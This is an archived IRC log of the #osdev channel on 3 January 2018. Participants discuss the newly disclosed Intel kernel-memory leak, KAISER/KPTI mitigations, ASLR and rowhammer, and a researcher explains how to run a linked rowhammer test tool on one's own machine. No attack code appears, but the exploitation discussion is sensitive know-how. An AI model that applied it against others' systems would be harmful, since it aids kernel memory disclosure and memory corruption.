Search logs:

channel logs for 2004 - 2010 are archived at http://tunes.org/~nef/logs/old/ ·· can't be searched

#osdev2 = #osdev @ Libera from 23may2021 to present

#osdev @ OPN/FreeNode from 3apr2001 to 23may2021

all other channels are on OPN/FreeNode from 2004 to present


http://bespin.org/~qz/search/?view=1&c=osdev&y=18&m=1&d=3

Wednesday, 3 January 2018

00:00:00 --- log: started osdev/18.01.03
00:00:04 --- quit: quc (Remote host closed the connection)
00:00:21 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
00:00:22 --- quit: caen23 (Ping timeout: 248 seconds)
00:05:29 --- join: Barrett (~barrett@unaffiliated/barrett) joined #osdev
00:12:22 --- quit: awang (Ping timeout: 272 seconds)
00:25:26 --- quit: daniele_athome (Ping timeout: 248 seconds)
00:26:32 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
00:30:34 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
00:32:50 --- quit: dbittman (Ping timeout: 246 seconds)
00:35:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
00:41:30 --- quit: caen23 (Ping timeout: 250 seconds)
00:43:37 --- join: regreg (~regreg@85.121.54.224) joined #osdev
00:51:13 --- join: bm371613 (~bartek@2a02:a317:603f:9800:391:ed9f:1c09:1285) joined #osdev
00:58:26 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
01:02:04 --- join: Pseudonym73 (~Pseudonym@210-84-37-58.dyn.iinet.net.au) joined #osdev
01:02:46 --- quit: caen23 (Ping timeout: 248 seconds)
01:05:51 --- quit: mavhq (Read error: Connection reset by peer)
01:07:08 --- join: mavhq (~quassel@cpc77319-basf12-2-0-cust433.12-3.cable.virginm.net) joined #osdev
01:09:50 --- quit: variable (Quit: /dev/null is full)
01:10:32 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:10:37 --- quit: variable (Client Quit)
01:12:09 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:12:09 --- quit: variable (Client Quit)
01:12:45 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
01:12:56 --- quit: variable (Client Quit)
01:19:06 --- quit: Pseudonym73 (Quit: Leaving...)
01:20:33 --- quit: hmmmm (Remote host closed the connection)
01:23:59 --- quit: nzoueidi (Quit: WeeChat 2.0)
01:28:05 --- join: m3nt4L (~asvos@2a02:587:a019:8300:3285:a9ff:fe8f:665d) joined #osdev
01:28:05 --- quit: m3nt4L (Client Quit)
01:29:19 --- quit: oaken-source (Ping timeout: 256 seconds)
01:31:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
01:31:40 --- quit: Barrett (Quit: exit)
01:37:28 --- quit: caen23 (Ping timeout: 240 seconds)
01:44:30 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
01:44:39 --- quit: raphaelsc (Remote host closed the connection)
01:45:25 <Brnocrist> https://gist.github.com/dougallj/f9ffd7e37db35ee953729491cfb71392
01:45:27 <bslsk05> ​gist.github.com: x86-64 Speculative Execution Harness · GitHub
01:47:59 --- join: paranoidandroid_ (4ea247be@gateway/web/freenode/ip.78.162.71.190) joined #osdev
01:55:17 --- join: Asu (~sdelang@AMarseille-658-1-48-133.w90-37.abo.wanadoo.fr) joined #osdev
02:02:35 --- quit: wcstok (Read error: Connection reset by peer)
02:04:09 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
02:06:42 <__pycache__> apparently intel CEO sold lots of stocks in nov
02:06:52 <__pycache__> which makes me believe that they knew about this at least since then
02:07:50 --- quit: godel (Ping timeout: 248 seconds)
02:08:32 <__pycache__> people wonder the real reason behind intel's single core power; im thinking it's things like this. and the thing is, this actually causes intel systems to go slower than amd systems at this point
02:08:55 <__pycache__> when successfully mitigated
02:09:07 --- quit: caen23 (Ping timeout: 264 seconds)
02:10:05 --- join: vdamewood (~vdamewood@unaffiliated/vdamewood) joined #osdev
02:10:09 <Kazinsal> I usually try to avoid the insider conspiracy speculation but by all accounts the Windows kernel team committed a PTI trampoline to RS4 some time in november
02:15:19 <Kazinsal> And the KAISER/FUCKWIT project has also been in the works since November.
02:16:26 <Kazinsal> In my hopes and dreams Intel's engineering team had a conference call with the Windows kernel leads, the macOS kernel leads, and Linus Torvalds, started recording, told them all about the bug at once, then muted the mic and went for coffee
02:16:37 --- quit: nzoueidi (Quit: WeeChat 2.0)
02:17:22 --- join: OXCC (~doubledip@ip5451817e.direct-adsl.nl) joined #osdev
02:20:56 --- join: glauxosdever (~alex@ppp-94-66-43-97.home.otenet.gr) joined #osdev
02:21:23 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
02:25:58 --- quit: OXCC (Ping timeout: 248 seconds)
02:34:48 <izabera> and came back from coffee without a job
02:34:51 --- quit: KidBeta (Quit: My MacBook Pro has gone to sleep. ZZZzzz…)
02:38:43 --- join: sdfgsdfg (~sdfgsdfg@unaffiliated/sdfgsdfg) joined #osdev
02:41:49 --- join: vmlinuz (vmlinuz@nat/ibm.br/x-lhweahvqfqzcaiwc) joined #osdev
02:41:49 --- quit: vmlinuz (Changing host)
02:41:49 --- join: vmlinuz (vmlinuz@unaffiliated/vmlinuz) joined #osdev
02:44:02 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
02:50:43 --- quit: caen23 (Ping timeout: 260 seconds)
03:00:27 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
03:00:31 --- join: m_t (~m_t@p5DDA1E9C.dip0.t-ipconnect.de) joined #osdev
03:03:29 <Brnocrist> isn't it a fake news about intel CEO?
03:13:20 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
03:16:08 --- quit: regreg (Ping timeout: 248 seconds)
03:27:38 --- join: alphawarr1or (uid243905@gateway/web/irccloud.com/x-giyrbiwadubebxva) joined #osdev
03:41:14 --- quit: caen23 (Ping timeout: 240 seconds)
03:52:47 --- nick: ExtremeUltraFMan -> PointlessMan
04:07:54 --- join: oaken-source (~oaken-sou@141.89.226.146) joined #osdev
04:10:12 --- quit: dengke (Ping timeout: 268 seconds)
04:10:55 <lava> Kazinsal: we published the first version of the KAISER kernel patch in may
04:11:04 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
04:11:34 <lava> and we already described the idea to do that in a paper mid 2016
04:12:07 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
04:12:28 --- join: dengke (~dengke@106.120.101.38) joined #osdev
04:14:32 --- join: ziongate (~angelo@mittelab/members/ziongate) joined #osdev
04:16:23 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
04:18:05 --- join: Halofreak1990 (~FooBar247@94.208.165.55) joined #osdev
04:28:58 --- join: zng (~zng@ool-18ba49be.dyn.optonline.net) joined #osdev
04:31:37 <Brnocrist> with this paper I guess https://gruss.cc/files/prefetch.pdf
04:32:24 --- join: navidr (uid112413@gateway/web/irccloud.com/x-vhupcdxgqlnqdefr) joined #osdev
04:34:27 --- join: CheckDavid (uid14990@gateway/web/irccloud.com/x-dfikbasdxspykqvo) joined #osdev
04:39:55 --- join: uvgroovy (~uvgroovy@c-65-96-163-219.hsd1.ma.comcast.net) joined #osdev
04:39:57 --- quit: uvgroovy (Remote host closed the connection)
04:40:09 --- join: uvgroovy (~uvgroovy@2601:184:4980:e75:5574:74af:c3ae:f99a) joined #osdev
04:43:26 --- quit: immibis (Ping timeout: 272 seconds)
04:44:44 --- quit: sdfgsdfg (Ping timeout: 268 seconds)
04:44:51 <MrOlsen> oh man, clang is killing me... half my binaries are faulting with an invalid opcode
04:46:18 <izabera> what about the other half
04:47:01 <MrOlsen> they are still working!
04:48:04 --- quit: dengke (Read error: Connection timed out)
04:48:12 <izabera> good, now go on and be an optimist
04:48:14 <MrOlsen> i suspect two things... either something in my process initialization is not zeroing out memory so variables/pointers are not zero'd
04:48:42 <MrOlsen> or the relocation tables are not being correctly initialized
04:48:50 <MrOlsen> i'll have to write a quick program to test
04:50:32 <meowrobot> how many layers of indirection is generally "too much"?
04:50:47 <izabera> ***this
04:50:50 <meowrobot> i.e., consider an array of structs, where each struct has a pointer to some random arbitrary struct
04:51:00 <izabera> google 3 star programmer
04:51:33 <meowrobot> interesting
04:53:29 <renopt> MrOlsen: hmm, maybe clang assumes you call the contructor fuctions
04:53:33 <renopt> like you would in c++
04:54:32 <MrOlsen> yeah, i'm thinking my crtX functions aren't handling the .ctor
04:55:10 <MrOlsen> I'll brb
04:56:38 --- join: dengke (~dengke@106.120.101.38) joined #osdev
04:57:32 --- quit: uvgroovy (Quit: uvgroovy)
05:08:09 <MrOlsen> damn it's cold outside
05:08:26 --- quit: daniele_athome (Ping timeout: 250 seconds)
05:08:56 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
05:14:49 --- join: lijero (~lijero@unaffiliated/lijero) joined #osdev
05:20:26 <meowrobot> yeah, googling three-star programmer is showing me information completely tangential to what i'm thinking about :p
05:20:37 <meowrobot> though, point taken about excessive templates...
05:30:04 --- quit: quc (Remote host closed the connection)
05:30:26 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
05:35:59 <meowrobot> okay reading more, it seems three-star programming describes a phenomenon very different from what i'd considered
05:36:03 <meowrobot> good, good
05:39:23 --- join: awang (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
05:50:16 <hydraz> what did you think it was?
05:50:54 <meowrobot> no idea, this is the first time i've heard of the term
05:51:38 <meowrobot> my original question was more along the lines of "how many pointers to pointers can cause undesirable effects, like cache misses"
05:51:44 --- join: fujisan (uid4207@gateway/web/irccloud.com/x-acahzsbntpejfhsi) joined #osdev
05:52:12 <hydraz> ah
05:53:04 <meowrobot> so, i was thinking of a series of data structures that would be an array of structs, with each of these structs containing a pointer to another type of struct, of some arbitrary layout
05:54:45 <izabera> then the answer is 1
05:55:20 <doug16k> MrOlsen, what cpu? on x86 you have to explicitly enable SSE, and the compiler is probably assuming SSE is enabled and available unless you told it otherwise
05:55:53 <meowrobot> izabera: array.struct, then end there?
05:56:35 <meowrobot> instead of array.struct->struct
05:56:36 <izabera> the point is that you want to minimize unpredictable jumps in memory
05:56:42 <meowrobot> i see
05:59:21 <doug16k> MrOlsen, when looking at invalid opcode exceptions, first see if it is at some ridiculous address, and if so, look for a return address after the address in stack pointer register. second, see if the opcodes are valid and you have not initialized the cpu sufficiently
06:00:03 --- quit: quc (Remote host closed the connection)
06:00:18 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
06:00:40 <doug16k> if you indirect called off an uninitialized vtable, the stack have a return address in there that points to the instruction following the call
06:04:06 --- quit: awang (Ping timeout: 248 seconds)
06:12:47 <izabera> run it in a debugger
06:20:42 --- join: caen23 (~caen23@79.118.94.187) joined #osdev
06:21:07 --- join: zesterer (~zesterer@cpc138506-newt42-2-0-cust207.19-3.cable.virginm.net) joined #osdev
06:21:47 <zesterer> I've come here to see what you people think of the Intel x86 branch prediction bug. Opinions?
06:23:07 <zesterer> I also saw a comment from someone somewhere that suggested that it might be possible to dedicate a single core to kernel operations and the rest to user-space operations, thereby reducing the overhead required for the workaround (since only one core needs to deal with the whole switch-out-CR3 issue)
06:23:27 <Brnocrist> where did you read it?
06:25:55 --- quit: daniele_athome (Ping timeout: 264 seconds)
06:27:32 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
06:32:45 <bcos_> zesterer: This one: https://arstechnica.com/information-technology/2016/10/flaw-in-intel-chips-could-make-malware-attacks-more-potent/ ?
06:32:47 <bslsk05> ​arstechnica.com: Flaw in Intel chips could make malware attacks more potent | Ars Technica
06:33:11 <zesterer> bcos_: Yes
06:33:33 <zesterer> Brnocrist: Just in the comments section of some article. I was wondering if it's a feasible partial solution.
06:33:47 <bcos_> Seems to be a recent trend - anything that causes a timing difference = "OMG the useles ASLR crap is broken again".. :-)
06:35:41 <grawity> maybe it'll force people to write more efficient programs
06:35:54 <grawity> (lol no it won't)
06:37:19 <zesterer> bcos_: Do you think it's being overstated?
06:37:36 --- quit: osa1 (Ping timeout: 256 seconds)
06:39:38 <bcos_> zesterer: The long story?
06:40:21 --- quit: jack_rabbit (Ping timeout: 265 seconds)
06:42:53 <zesterer> bcos_: Hmmm>
06:42:57 <zesterer> *?
06:42:59 <bcos_> Once upon a time a n00b student decided to write a kernel. His lecturer suggested micro-kernels are better, but the n00b ignored his lecturer. For memory management, the n00b decided to map all physical memory into kernel space "as is" creating a strong relationship between kernel-space addresses and physical addresses (among other problems).
06:43:20 <bcos_> ..fast forward...
06:44:57 <__pycache__> what's #osdev's opinions on go?
06:45:03 <__pycache__> as in golang
06:45:28 <bcos_> Kernel becomes popular for political reasons, address space randomisation broken on a yearly basis. Rowhammer comes out - ASLR (the only real defence they can think of) still broken yearly.
06:45:44 --- quit: oaken-source (Ping timeout: 248 seconds)
06:45:49 <__pycache__> bcos_: i assume that this story began in 1991?
06:45:56 * bcos_ nods
06:46:11 <__pycache__> would the grandpa paradox be worth it
06:46:29 <__pycache__> if you had a timewarp to 1991
06:46:48 <bcos_> I'm not sure which one..
06:46:50 <froggey> you want bcos_ to become linus' grandpa?
06:47:22 <__pycache__> if you destroy your reason for going through time, what happens?
06:47:35 <__pycache__> if you go back in time to undo something
06:47:49 <__pycache__> will time get stuck in a loop?
06:48:15 <bcos_> __pycache__: When I find out, I'll let you know yesterday
06:49:03 <zesterer> bcos_: So as you see it, this is all a fault of not using microkernels?
06:49:09 <froggey> bcos_: what about NT? which afaik doesn't use a direct physical map but is still implementing a similar mitigation
06:50:08 --- join: Darmor (~Tom@198-91-187-5.cpe.distributel.net) joined #osdev
06:50:35 <bcos_> zesterer: Not just that - mapping RAM into kernel space "as is" contributes
06:51:25 <bcos_> froggey: Not sure about NT internals - might just be marketing
06:51:37 <zesterer> bcos_: I'm not sure what you mean. Do you mean mapping the kernel space into userland address tables?
06:51:54 <bcos_> ("oh, our competitors are doing X so I guess people will expect us to match it")
06:51:58 <froggey> a 30% performance penalty is an interesting form of marketing
06:53:02 <bcos_> zesterer: For something like rowhammer (where attacker can manipulate physical addresses) a strong relationship between kernel virtual addresses and physical addresses helps attacker target specific pieces of kernel (if they know kernel virtual addresses)
06:53:24 --- join: jack_rabbit (~jack_rabb@c-98-228-48-226.hsd1.il.comcast.net) joined #osdev
06:53:31 <__pycache__> i just had someone in #go-nuts recommend RPC over HTTP for plugins for an IRC bot
06:53:31 <__pycache__> i GC paused for 10 seconds
06:55:13 <zesterer> bcos_: Surely there is some stuff that must be kept at fixed addresses through? Or is that largely redundant for modern devices?
06:57:10 <bcos_> zesterer: The only things I can think of that needs a fixed physical address are the firmware's ROM and legacy video frame buffer
06:57:51 <bcos_> D'oh - and BIOS boot code I guess
06:57:53 <zesterer> bcos_: Fair enough. I've not ventured past about 1990 when it comes to PC hardware yet, so I'm not too informed.
06:58:07 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
06:58:18 <zesterer> gtg, thanks for the discussion
06:58:23 <bcos_> :-)
06:58:28 <meowrobot> bcos_: is that to imply *BSD does not have this vulnerability?
06:59:52 <bcos_> For the latest vulnerability, I'm not even sure if it's a vulnerability yet
06:59:55 --- quit: zesterer (Quit: zesterer)
07:00:11 --- quit: CheckDavid (Quit: Connection closed for inactivity)
07:00:43 <bcos_> - the reactions from Linux and Microsoft seems too hasty for "LOL, ASLR is broken again" though
07:02:35 <bcos_> Hrm
07:02:53 <meowrobot> speaking of ASLR, i just thought now, that would defeat attempts to keep pointers to pointers in relatively predictable spots...
07:02:59 <bcos_> Can't even seem to find out when the "embargo" is supposed to end
07:03:32 <meowrobot> maybe that concern is entirely academic in light of ASLR
07:05:10 <bauen1> so uhm what exactly is the "Ban me, theme can not be unset" i just clicked ?
07:06:50 <bcos_> bauen1: On osdev forums? It's a trap designed to confine a malicous user
07:07:20 <bauen1> uhm bad question: how do i cange it back ?
07:07:28 <bcos_> You can't
07:08:03 <bauen1> :/
07:08:30 <bauen1> really ?
07:09:09 <bcos_> Yes - wouldn't be a very good trap if you could escape..
07:09:20 <bcos_> Give me a few minutes I'll see if I can do anything
07:09:23 <bauen1> who tf put it at the top of the list ?
07:12:15 --- join: svk (~svk@port-92-203-6-87.dynamic.qsc.de) joined #osdev
07:13:05 <bcos_> bauen1: See if that helped (not sure if you'll need to log out & log back in)
07:14:31 <bauen1> btw logging out is a bit _difficult_ with that time
07:14:51 <bauen1> bcos_: thanks
07:16:38 <bcos_> :-)
07:21:06 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
07:21:09 --- quit: uvgroovy (Remote host closed the connection)
07:21:40 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
07:23:08 <vdamewood> I'm kind of curious what's going on there.
07:26:21 <froggey> https://twitter.com/brainsmoke/status/948561799875502080 looks like a read of kernel memory
07:26:22 <bslsk05> ​twitter: <brainsmoke> Bingo! #kpti #intelbug https://pbs.twimg.com/media/DSn30-UW4AEV13B.jpg
07:28:32 <meowrobot> .theo
07:28:32 <glenda> I would like to see some proof of that.
07:28:57 <bcos_> Hrm. "no page faults required".. There was some earlier work on using TSX to avoid the page faults
07:29:26 <bcos_> At least now I know the vulnerability allows reads from kernel space
07:30:40 --- quit: bemeurer (Ping timeout: 255 seconds)
07:31:56 --- join: osa1 (~omer@212.252.142.138) joined #osdev
07:31:56 --- quit: osa1 (Changing host)
07:31:56 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
07:33:14 <doug16k> my bullshit gauge pegs when I read security articles
07:33:36 <bcos_> Mine too - I start out very cynical.. :-)
07:34:10 <bcos_> For this one, I think I've reached the stage of being worried - there's enough bread crumbs to follow
07:34:13 --- join: hmmmm (~sdfgsf@pool-72-79-161-183.sctnpa.east.verizon.net) joined #osdev
07:34:26 --- quit: xenos1984 (Quit: Leaving.)
07:34:55 <doug16k> ok, let's say they have the kernel address, in the clear. put the kernel load address in a text file in a world accessible location. then what?
07:35:07 <doug16k> then rely on _another_ real vulnerability in something to use it?
07:35:56 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
07:36:09 <doug16k> it's like having buttons wired to bombs, and complaining about the buttons are wired up, and ignoring the bombs
07:37:20 --- quit: inode (Quit: )
07:38:37 <Prf_Jakob> doug16k: Doesn't rowhammer still excist?
07:38:53 <Prf_Jakob> The only fix for it was just moving things around.
07:39:18 <doug16k> hypothetically? sure. have I seen a rowhammer test work on my ram? never
07:40:50 <doug16k> if hypothetical is the bar, then all writes to memory potentially change kernel addresses
07:41:02 <doug16k> writes to dram can affect other unrelated nearby bits
07:41:57 <doug16k> it's called bad memory
07:43:39 <doug16k> if security researchers had their way, we'd live in underground caves lined with titanium and carbide alloy, because meteors
07:44:14 <svk> maybe one could leak kernel memory with something like: mov rax, kerneladdress; cmp rax, $somevalue; hence messing with the branchpredictor so you can guess the value stored there
07:45:26 <Prf_Jakob> On the wikipedia article rowhammer sounds more then just hypothetical.
07:49:13 --- quit: bemeurer (Ping timeout: 252 seconds)
07:51:53 <lava> i have many computers where you can flip bits with rowhammer all the time
07:52:10 <lava> i have 1 where no bits flip
07:52:10 --- quit: osa1 (Ping timeout: 272 seconds)
07:52:22 <lava> most people just don't hammer the right way
07:52:27 <lava> hammering the right way is complicated
07:53:03 <bcos_> Most people should be using ECC :-(
07:55:13 <immersive> https://twitter.com/thegrugq/status/948569897390415872 shit
07:55:14 <bslsk05> ​twitter: <thegrugq> Speculation over. Intel bug has been reproduced with a PoC. [<brainsmoke> Bingo! #kpti #intelbug https://pbs.twimg.com/media/DSn30-UW4AEV13B.jpg ]
07:55:25 <doug16k> get ram with big heat sinks and run it above 1.2V. that greatly reduces the chance of these "voltage fluctuations" from fluctuating out of spec
07:55:32 <lava> not really
07:55:43 <lava> i investigated the influence of voltage on rowhammer bit flips
07:55:44 --- join: xenos1984 (~xenos1984@22-164-191-90.dyn.estpak.ee) joined #osdev
07:56:03 <lava> no significant effect in either direction
07:56:10 <lava> at least not on rowhammer
07:56:20 <lava> system rejects to work at some bound
07:56:27 <doug16k> lava, sorry, I don't buy it
07:56:35 <lava> ?
07:56:38 <lava> i did try that
07:56:48 <lava> i assume that the sense amplifiers scale with it
07:57:01 <lava> higher voltage -> sense amplifiers need higher charge to say it's a one
07:57:27 --- join: pictron (~tom@pool-173-79-33-247.washdc.fios.verizon.net) joined #osdev
07:57:33 <doug16k> and higher charge in each cell, so the leakdown will last longer without a refresh cycle
07:57:37 <lava> you would need to change the sense amplifiers threshold alone, that could have an effect, not sure it will
07:57:41 <lava> but
07:58:06 <lava> also with the higher voltage, the sense amplifier needs a higher charge to say it's a zero
07:58:10 <lava> in effect it remains the same
07:58:14 <bcos_> Fact: If you run modern RAM at 1000V no bit will flip ever again! :-)
07:58:15 <lava> i tried that on multiple systems
07:58:37 <lava> went from lower end where it still booted, to upper end where it still booted
07:58:43 <lava> nothing, no significant effect
07:58:49 <lava> else i would already have published that
07:58:57 <lava> i was hoping to find that it has an effect
07:59:00 <lava> but it didn't
07:59:30 <doug16k> lava, got a test program I can run to see rowhammer happening first person?
07:59:41 <doug16k> because assertions don't pull much weight with me
07:59:52 <Prf_Jakob> rowhammer.js?
08:00:02 <Prf_Jakob> It even has a catchy name
08:00:57 <lava> https://github.com/IAIK/rowhammerjs/tree/master/native this one
08:01:02 <bslsk05> ​github.com: rowhammerjs/native at master · IAIK/rowhammerjs · GitHub
08:01:05 <lava> native code, needs root for ideal hammering
08:01:22 <lava> you will still have to fix some constants for your system
08:01:27 <doug16k> really? js? come on
08:01:33 <lava> this one is not js
08:01:45 <lava> this one is C++
08:01:56 <lava> but we kept it all in one repo for that paper
08:02:01 --- join: banisterfiend (~banister@ruby/staff/banisterfiend) joined #osdev
08:02:12 --- join: multi_io_ (~olaf@77.180.93.255) joined #osdev
08:04:45 <doug16k> what should I do on ryzen with DDR4? just make?
08:04:50 --- quit: multi_io (Ping timeout: 240 seconds)
08:05:59 --- quit: uvgroovy (Quit: uvgroovy)
08:06:31 --- quit: svk (Quit: Leaving)
08:08:48 <doug16k> lava, how long should it take?
08:10:00 <lava> never tried ryzen
08:10:06 <lava> no clue what the mapping functions look like there
08:10:11 <lava> DDR4 is generally susceptible though
08:10:30 <garit> https://i.imgur.com/nGGI77r.png - raytracing 1mln rays from a point above the screen. I expected to see a circle of light but i see square. whos guilty? prng, line-to-plane intersection algorithm, something else?
08:10:37 <lava> i would recommend reverse engineering the mapping functions first: https://github.com/IAIK/drama/tree/master/re
08:10:39 <bslsk05> ​github.com: drama/re at master · IAIK/drama · GitHub
08:10:48 <lava> then put these mapping functions in the rowhammer tool
08:10:53 <lava> and then you can see whether a bit flips
08:11:10 <lava> i have machines with bit flip rates between multiple hundred per second to 3 per 24 hours
08:11:21 --- join: R3x_ (uid181433@gateway/web/irccloud.com/x-lqnknpuktgiomqla) joined #osdev
08:12:01 --- quit: glauxosdever (Quit: leaving)
08:13:10 <doug16k> lava, why would they require root?
08:13:34 <doug16k> you don't need rowhammer with root
08:14:39 --- join: osa1 (~omer@212.252.142.138) joined #osdev
08:14:39 --- quit: osa1 (Changing host)
08:14:39 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
08:17:00 <doug16k> measure aborts with assertion: measure: measure.cpp:94: void setupMapping(): Assertion `mapping != (void *) -1' failed.
08:18:20 --- join: freakazoid0223 (~IceChat9@pool-108-52-4-148.phlapa.fios.verizon.net) joined #osdev
08:18:54 <lava> ...
08:18:56 <lava> needs root
08:19:00 <lava> for physical address information
08:19:06 <lava> you're not trying to mount a real attack here
08:19:07 <doug16k> ya still asserts with root
08:19:12 <lava> uh
08:19:14 <lava> not linux?
08:19:17 <doug16k> linux
08:19:31 <doug16k> had to give tiny memory percentage to avoid assertion
08:19:48 <doug16k> 32 GB machine
08:19:56 <lava> ah
08:19:56 <lava> yes
08:21:27 --- join: grzesiek (~grzesiek@PC-77-46-101-67.euro-net.pl) joined #osdev
08:21:33 <doug16k> in case you're interested, 1% failed, 0.1% runs
08:25:47 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
08:28:43 <doug16k> oh I see the problem. the command line help says "percentage" but it is really a multiplier
08:28:55 <doug16k> 1 = 100%
08:29:55 --- quit: fujisan (Quit: Connection closed for inactivity)
08:32:17 <mawk> lol
08:32:39 --- join: vaibhav (~vnagare@125.16.97.124) joined #osdev
08:36:30 --- quit: bemeurer (Ping timeout: 272 seconds)
08:37:53 <doug16k> lava, surely you have seen machines that run it indefinitely with zero flips, right?
08:39:02 --- quit: dengke (Ping timeout: 250 seconds)
08:39:45 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
08:40:18 --- join: dengke (~dengke@106.120.101.38) joined #osdev
08:43:24 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
08:43:37 --- quit: vdamewood (Quit: Textual IRC Client: www.textualapp.com)
08:44:52 --- quit: uvgroovy (Client Quit)
08:45:04 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
08:45:42 --- quit: voidah (Ping timeout: 248 seconds)
08:47:00 --- quit: qeos|2 (Read error: Connection reset by peer)
08:47:15 --- join: wcstok (~Me@c-71-197-192-147.hsd1.wa.comcast.net) joined #osdev
08:47:16 --- quit: bm371613 (Quit: Konversation terminated!)
08:47:23 --- join: qeos|2 (~qeos@ppp158-255-171-31.pppoe.spdop.ru) joined #osdev
08:49:22 <lava> yes
08:49:33 <lava> a small percentage of systems
08:49:41 <lava> maybe like 20% of systems
08:51:29 <doug16k> lava, I got this: https://gist.github.com/doug65536/c4abec923c502dc5c383e9c7aac6afd6
08:51:31 <bslsk05> ​gist.github.com: gist:c4abec923c502dc5c383e9c7aac6afd6 · GitHub
08:51:56 <doug16k> does that mean I add a #if to get_dram_mapping which lists the 100% ones?
08:57:25 --- quit: bemeurer (Ping timeout: 252 seconds)
08:59:02 <lava> looks inconclusive
08:59:12 <lava> that's too many 100% cases i would say
08:59:19 <lava> these are side channel attacks, they are inherently noisy
08:59:31 <lava> i exchanged emails with one student a few weeks ago
08:59:47 <lava> he worked on this for like 3-4 weeks to finally get the dram functions of his system
09:00:44 --- join: bcos (~bcos@1.123.132.248) joined #osdev
09:02:04 <doug16k> ah
09:04:19 --- quit: bcos_ (Ping timeout: 264 seconds)
09:04:53 --- join: John__ (~John__@79.97.140.214) joined #osdev
09:08:38 --- quit: Darmor (Ping timeout: 248 seconds)
09:08:43 --- quit: bauen1 (Ping timeout: 265 seconds)
09:18:45 --- part: bipul left #osdev
09:21:17 --- join: voidah (~voidah@unaffiliated/voider) joined #osdev
09:21:45 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:23:34 --- quit: nzoueidi (Ping timeout: 248 seconds)
09:24:17 --- join: gdh (~gdh@2605:a601:639:2c00:b9b9:c985:3d11:4f62) joined #osdev
09:30:37 --- join: marshmallow (~xyz@unaffiliated/marshmallow) joined #osdev
09:31:48 --- quit: bemeurer (Ping timeout: 255 seconds)
09:34:51 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:37:05 --- join: oaken-source (~oaken-sou@p3E9D33F7.dip0.t-ipconnect.de) joined #osdev
09:38:08 --- join: _sfiguser (~sfigguser@host194-66-dynamic.116-80-r.retail.telecomitalia.it) joined #osdev
09:40:45 --- quit: bemeurer (Ping timeout: 276 seconds)
09:44:52 --- join: josuedhg (~josuedhg_@134.134.139.83) joined #osdev
09:44:53 <marshmallow> don't know where to ask, it's a curiosity. say I can arbitrarily read kernel memory, how could this be turn potentially into a execution of arbitrary code? wouldn't it require to have a further bug to achieve ROP?
09:50:46 <bcos> Does kernel use capabilities or store encryption keys or passwords for anything?
09:52:18 <Prf_Jakob> marshmallow: Well there is rowhammer, which is still out there and just mitigated by the fact that the attacker doesn't know where the kernel keeps thing, which they now can.
09:52:39 <Prf_Jakob> can figure out*
09:52:48 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
09:56:47 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:59:38 <izabera> there's no way to use that for ROP
10:02:23 <marshmallow> izabera: why note?
10:02:28 <marshmallow> *not
10:03:12 <izabera> because you can't even read that memory normally, and you definitely can't just jump in the middle of it and execute it
10:04:11 <marshmallow> unless you have some sort of other memory corruption
10:10:03 --- quit: quc (Remote host closed the connection)
10:10:17 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
10:11:28 --- join: regreg__ (~regreg@85.121.54.224) joined #osdev
10:13:12 --- quit: immersive (Quit: bye)
10:14:14 --- quit: bauen1 (Ping timeout: 248 seconds)
10:14:29 --- join: clickjack (~clickjack@185.161.200.10) joined #osdev
10:14:37 --- quit: regreg_ (Ping timeout: 256 seconds)
10:19:00 --- quit: nur (Remote host closed the connection)
10:21:32 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
10:23:20 --- join: nur (~hussein@175.141.12.82) joined #osdev
10:26:20 --- quit: osa1 (Ping timeout: 240 seconds)
10:26:55 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
10:28:26 <marshmallow> Prf_Jakob: what about if TRR mode is on?
10:30:41 --- quit: regreg__ (Ping timeout: 268 seconds)
10:31:50 --- quit: bauen1 (Ping timeout: 248 seconds)
